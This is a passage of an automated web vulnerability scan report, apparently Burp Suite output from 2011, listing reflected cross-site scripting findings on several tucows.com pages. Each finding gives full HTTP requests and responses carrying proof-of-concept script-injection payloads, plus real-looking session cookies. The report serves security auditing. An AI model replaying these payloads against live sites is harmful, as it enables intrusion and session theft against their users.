<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8030"-alert(1)-"d2a10cd4b2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imagesb8030"-alert(1)-"d2a10cd4b2f/newassets/lostpass.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2408f"-alert(1)-"745fc17afdb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets2408f"-alert(1)-"745fc17afdb/lostpass.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f369"-alert(1)-"1c6dab942a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/lostpass.html3f369"-alert(1)-"1c6dab942a HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.319. http://www.tucows.com/images/newassets/lostpass.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/lostpass.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10cdc"-alert(1)-"bef9c960c47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/lostpass.html?10cdc"-alert(1)-"bef9c960c47=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0054"-alert(1)-"f4d5b36deb7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imagesa0054"-alert(1)-"f4d5b36deb7/newassets/privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:47 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a40ac"-alert(1)-"9549b461301 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassetsa40ac"-alert(1)-"9549b461301/privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feb32"-alert(1)-"50d4670b506 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/privacy.htmlfeb32"-alert(1)-"50d4670b506 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.323. http://www.tucows.com/images/newassets/privacy.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/privacy.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1a3a"-alert(1)-"4dfa8e6d415 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/privacy.html?b1a3a"-alert(1)-"4dfa8e6d415=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60f39"-alert(1)-"f5b143ebb35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images60f39"-alert(1)-"f5b143ebb35/newassets/safesearchtoggle.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ffc5"-alert(1)-"d8706d26674 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets7ffc5"-alert(1)-"d8706d26674/safesearchtoggle.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:35 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e60fe"-alert(1)-"be3796b76d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/safesearchtoggle.htmle60fe"-alert(1)-"be3796b76d HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:44 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.327. http://www.tucows.com/images/newassets/safesearchtoggle.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.tucows.com
Path: /images/newassets/safesearchtoggle.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3b77"-alert(1)-"99a3ca1e499 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/safesearchtoggle.html?d3b77"-alert(1)-"99a3ca1e499=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:59 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7005"-alert(1)-"da1cff69e08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imagesa7005"-alert(1)-"da1cff69e08/newassets/search.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
